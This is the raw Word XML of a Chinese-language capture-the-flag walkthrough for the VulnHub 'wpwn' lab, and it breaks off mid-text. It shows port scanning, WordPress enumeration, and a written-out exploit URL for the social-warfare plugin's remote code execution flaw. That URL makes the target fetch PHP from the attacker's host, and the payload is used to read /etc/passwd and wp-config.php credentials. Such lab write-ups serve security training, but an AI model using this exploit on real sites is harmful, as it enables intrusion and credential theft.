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49D372" w14:textId="3195E6E4" w:rsidR="007B1E02" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC78BEC" w14:textId="0A99A889" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="0006000D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="000E33C5">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/wpwn-1,537/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60722C00" w14:textId="206B7C78" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难度为简单，在V</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下运行，有2个flag一个是在</w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下另外一个是在root下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AA369" w14:textId="5692C808" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A579FA5" wp14:editId="7592622B">
            <wp:extent cx="5274310" cy="17735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0BCD6" w14:textId="50600E32" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="100D6337" w14:textId="7049D6D9" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载完以后解压有个文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85C7CE" w14:textId="5BC42416" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF1DAEA" wp14:editId="6FE8C87B">
            <wp:extent cx="5274310" cy="3949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95782" w14:textId="05826CF8" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面会有个.</w:t>
      </w:r>
      <w:r>
        <w:t>ovf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，双击点开以后找个地方存放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18746A26" w14:textId="779B17EB" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05045353" wp14:editId="1323C75E">
            <wp:extent cx="5274310" cy="5518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18A8F" w14:textId="351F4F28" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="0D2C7831" w14:textId="1AD44D4B" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络连接记得调回N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以开始攻击了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD383F9" w14:textId="5DA5F350" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="668EA5BE" wp14:editId="110CDA4C">
            <wp:extent cx="3029106" cy="222896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106" cy="222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41F53" w14:textId="78638181" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行以后会自动显示靶机的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来这次不用n</w:t>
      </w:r>
      <w:r>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A3F16" w14:textId="1C6C23AF" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC709C1" wp14:editId="6C9714EB">
            <wp:extent cx="2730640" cy="717587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640" cy="71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1A0C0" w14:textId="11545EF0" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="6CCAD9BA" w14:textId="6D6BA296" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554935D3" w14:textId="19948B0F" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用nmap探测波端口,这次开放的比较少只有22和80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9DB056" w14:textId="01C85C9F" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.19.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E95E4C6" w14:textId="340CB060" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5353A4F4" wp14:editId="283672EF">
            <wp:extent cx="5274310" cy="24358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73554" w14:textId="7D87E850" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问波I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常回显开搞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB8CCAB" w14:textId="61E83574" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CB8F028" wp14:editId="4724BE60">
            <wp:extent cx="5274310" cy="9017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78EAA" w14:textId="4030DFB3" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="2E02AB4C" w14:textId="75ECBFEB" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B8200" w14:textId="047D2F65" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于不是正常的H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，所以先用d</w:t>
      </w:r>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探路，扫到2个好东西，第一个确认这是一个w</w:t>
      </w:r>
      <w:r>
        <w:t>ordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站，还有个r</w:t>
      </w:r>
      <w:r>
        <w:t>obots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117F167" w14:textId="518FDE01" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E0C0A16" wp14:editId="04C325D9">
            <wp:extent cx="3175163" cy="660434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163" cy="66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49B91" w14:textId="22A2EB0A" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="5F1F9674" w14:textId="41BCB3B4" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开/</w:t>
      </w:r>
      <w:r>
        <w:t>robots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。。。。行吧集中在w</w:t>
      </w:r>
      <w:r>
        <w:t>ordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496E66E" w14:textId="7F46CA44" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFB3D7" wp14:editId="6F9AD9D0">
            <wp:extent cx="2965602" cy="584230"/>
            <wp:effectExtent l="0" t="0" r="635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602" cy="58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A96A7" w14:textId="4F87F6C2" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="2E123E7A" w14:textId="038F7D7D" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="32CDE1DA" w14:textId="1F5E3FF0" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="7DC7A88F" w14:textId="6F9A7600" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="13ADC82D" w14:textId="2E1FBB1D" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用w</w:t>
      </w:r>
      <w:r>
        <w:t>pscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫到一个用户admin，然后扫到一个插件s</w:t>
      </w:r>
      <w:r>
        <w:t>ocial-warfare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A0C66" w14:textId="216B28CB" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="000E33C5">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.19.135</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -e</w:t>
      </w:r>
      <w:r w:rsidR="002407C2">
        <w:t>u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71158D65" w14:textId="43EB2D0F" w:rsidR="0006000D" w:rsidRDefault="002407C2" w:rsidP="0006000D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="000E33C5">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.19.135</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0858BE" w14:textId="7F54B40B" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57D4B284" wp14:editId="1ACB2B9C">
            <wp:extent cx="4635738" cy="74298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7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C08EC" w14:textId="35D3E45C" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D"/>
    <w:p w14:paraId="1CEC67C1" w14:textId="302C7B6E" w:rsidR="0006000D" w:rsidRDefault="0006000D" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="697C0DEF" wp14:editId="5CF6CFD1">
            <wp:extent cx="5274310" cy="18370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802C7" w14:textId="695B7AB9" w:rsidR="002407C2" w:rsidRDefault="002407C2" w:rsidP="0006000D"/>
    <w:p w14:paraId="75800D34" w14:textId="4C8789B6" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D"/>
    <w:p w14:paraId="06BAF4D8" w14:textId="3FAD9CC9" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="00C06D2C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x03:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>social</w:t>
      </w:r>
      <w:r>
        <w:t>-warfare RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB17FC9" w14:textId="091B9095" w:rsidR="002407C2" w:rsidRDefault="002407C2" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而关于这个插件在网上查了一下有个R</w:t>
      </w:r>
      <w:r>
        <w:t>CE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="002407C2">
        <w:t>https://www.cnblogs.com/-zhong/p/12422127.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815777B" w14:textId="01864AF2" w:rsidR="002407C2" w:rsidRDefault="002407C2" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099E12CA" wp14:editId="2AD0F39D">
            <wp:extent cx="5274310" cy="110807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5DCD7" w14:textId="2922A677" w:rsidR="002407C2" w:rsidRDefault="002407C2" w:rsidP="0006000D"/>
    <w:p w14:paraId="3158F85A" w14:textId="11A949C0" w:rsidR="002407C2" w:rsidRDefault="002407C2" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么按照步骤</w:t>
      </w:r>
      <w:r w:rsidR="00C06D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们需要在kali上创建一个文件，文件里面的内容就是恶意代码，比如说我这里说p</w:t>
      </w:r>
      <w:r w:rsidR="00C06D2C">
        <w:t>hpinfo();</w:t>
      </w:r>
      <w:r w:rsidR="00C06D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样，保存并命名为5</w:t>
      </w:r>
      <w:r w:rsidR="00C06D2C">
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22945D9A" w14:textId="267F051F" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C183F6C" wp14:editId="2663BE38">
            <wp:extent cx="1346269" cy="876345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269" cy="8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43CD7" w14:textId="3C125DFC" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D"/>
    <w:p w14:paraId="27AC5A53" w14:textId="34874C60" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后用python开启共享模式，这里我开了80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589D5F1" w14:textId="0264A8D5" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFAD7AD" wp14:editId="17711C68">
            <wp:extent cx="5105662" cy="622332"/>
            <wp:effectExtent l="0" t="0" r="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662" cy="62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DB6BD" w14:textId="22BEFB27" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D"/>
    <w:p w14:paraId="13B5D82B" w14:textId="0D063D61" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后访问下面的U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D78D2" w14:textId="6A8678C7" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="000E33C5">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.19.135/wordpress/wp-admin/admin-post.php?swp_debug=load_options&amp;swp_url=http://192.168.19.128/5.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="428989FA" w14:textId="6D87CAF9" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:t>(192.168.19.135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后192.168.19.128是我的kali的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，5.txt是我的恶意代码文件这里是想查看P</w:t>
      </w:r>
      <w:r>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本)，成功运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82A660" w14:textId="77492EC9" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33FCC98A" wp14:editId="1554F50A">
            <wp:extent cx="5274310" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="254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4D106" w14:textId="59738297" w:rsidR="00C06D2C" w:rsidRDefault="00C06D2C" w:rsidP="0006000D"/>
    <w:p w14:paraId="3F65BAFD" w14:textId="705DC545" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="00621868">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF9573" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BB6B63" w14:textId="1DE85A88" w:rsidR="00C06D2C" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里由于反弹shell失败了，走另外一条路，想法是先查看/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定，用户，然后在查看w</w:t>
      </w:r>
      <w:r>
        <w:t>p-config.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的密码能获取信息登录22端口这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5D411" w14:textId="0D058704" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="28195B3A" w14:textId="6778F31D" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把5</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26138A63" w14:textId="689E45AE" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="422CB881" wp14:editId="7C7326A3">
            <wp:extent cx="1759040" cy="730288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9040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417D4" w14:textId="37EF593F" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="588F2A33" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="0D8ADDBC" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="17CEDD41" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="174976BC" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="18DDA71F" w14:textId="77777777" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="743F9ADA" w14:textId="6E477A12" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回正常，然后找正常的用户，找到root和一个名为t</w:t>
      </w:r>
      <w:r>
        <w:t>akis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC8BD8" w14:textId="4722FFB9" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783421E6" wp14:editId="2552AE95">
            <wp:extent cx="5124713" cy="2775093"/>
            <wp:effectExtent l="0" t="0" r="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713" cy="277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9275D" w14:textId="74A63E0A" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="28A6FE58" w14:textId="40871E61" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后改成查看w</w:t>
      </w:r>
      <w:r>
        <w:t>pconfig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文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA556CB" w14:textId="473303BE" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F99A88" wp14:editId="5D9F66AE">
            <wp:extent cx="2895749" cy="762039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749" cy="7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36465" w14:textId="76183D2F" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="1AF02E6F" w14:textId="56CCEFEC" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在刷新，这里不用慌遇到这个页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D1751" w14:textId="18060C82" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
